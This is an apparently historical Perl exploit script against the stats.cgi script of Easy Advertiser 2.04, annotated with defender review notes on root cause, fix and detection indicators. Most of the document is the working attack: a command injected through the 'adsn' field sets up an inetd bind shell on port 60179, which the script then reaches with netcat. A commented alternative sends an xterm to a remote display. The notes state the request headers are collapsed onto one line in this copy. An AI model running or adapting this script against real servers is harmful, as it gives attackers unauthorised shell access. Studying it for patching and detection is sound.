#!/usr/bin/perl -w
## Easy Advertiser v. 2.04 / (c) 1999 Smokey
## Communications, LLC - PoC exploit.
## http://www.smokey.net/
##
## Exploits an insecure open() in the stats.cgi
## script. The exploit will attempt to bind a
## shell with nobody/99 privileges on port 60179
## This will not work if the $target does not
## have inetd installed. I have included the code
## to simply spawn an xterm as well.
##
## [Wed Oct 4 16:53:05 CEST 2000]
## (c) teleh0r@doglover.com / anno 2000
## http://teleh0r.cjb.net
#
# --- Review notes (defender's reading of this historical PoC) ---
#
# Root cause, as the header states: the CGI passes the user-supplied
# "adsn" form field to an insecure open(). The payload below wraps the
# value in "%7C" (URL-encoded "|") on both sides, which is consistent
# with a 2-arg open() being turned into a pipe. The server-side fix is a
# 3-arg open() with an explicit mode and no interpolation of request
# data into open(), system() or backticks; validate the field against
# an anchored whitelist and reject anything else.
#
# Indicators visible in this script, useful for detection and triage:
# host side, a new inetd config at /tmp/.hass, an additional inetd
# started with that file, a listener on TCP 60179 owned by the web
# server account ("nobody"), and a web-server child spawning /bin/bash;
# network side, a POST to /cgi-bin/stats.cgi whose body carries "%7C"
# in the adsn field, followed by an inbound connection to port 60179
# from the same client.
#
# Code-quality notes (code is left byte-for-byte as found):
#   * $length is declared but never assigned or read.
#   * SOCKET is a bareword (global) filehandle; a lexical handle is the
#     modern idiom.
#   * system("nc -w 10 $target 60179") interpolates $target into a shell
#     string; the list form of system() would avoid the shell entirely.
#   * The request string assigned to $sploit appears with its request
#     line and headers collapsed onto a single line in this copy; it is
#     kept exactly as found.

use strict;
use Socket;

# Exactly one argument is required: the remote host name or address.
if (@ARGV < 1) {
    print("Usage: $0 \n");
    exit(1);
}

# NOTE(review): $length is unused for the rest of the script.
my ($target,$length,$cgicode,$agent,$sploit, $iaddr,$paddr,$proto);
$target = $ARGV[0];

print("\nRemote host: $target\n");
print("CGI-script: /cgi-bin/stats.cgi\n");

# Hard-coded value for the User-Agent header.
$agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)";

# URL-encoded POST body; the author's two comment lines give the decoded
# content of the adsn field, which is what the vulnerable open() receives.
$cgicode =
# echo 'fido stream tcp nowait nobody /bin/bash bash -i' > /tmp/.hass;
# /usr/sbin/inetd /tmp/.hass
"stats=stats&name=teleh0r&adsn=%7Cecho+%27fido+stream+tcp+nowait".
"+nobody+%2Fbin%2Fbash+bash+-i%27+%3E+%2Ftmp%2F.hass%3B%2Fusr%2F".
"sbin%2Finetd+%2Ftmp%2F.hass%7C&login=Login";

# - Spawn an xterm - (alternative body, left commented out by the author)
# "stats=stats&name=teleh0r&adsn=%7Cxterm+-ut+-display+target.com".
# "%3A0%7C&login=Login";

# Raw HTTP/1.0 request with a hard-coded Content-length.
# NOTE(review): request line and headers are on one line in this copy; kept as found.
$sploit = "POST /cgi-bin/stats.cgi HTTP/1.0 Connection: close User-Agent: $agent Host: $target Content-type: application/x-www-form-urlencoded Content-length: 168 $cgicode";

# Resolve the host and open a TCP connection to port 80.
# NOTE(review): every "|| die" here binds to a parenthesised call, so the
# precedence is correct; "or die" is merely the conventional spelling.
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");

# Send the request followed by CRLF, then close without reading any reply.
send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n");
close(SOCKET);

# Pause, then connect to the port named in the header via netcat.
print("\nSleeping 5 seconds - waiting for the shell ...\n\n");
sleep(5);
system("nc -w 10 $target 60179");
exit(0);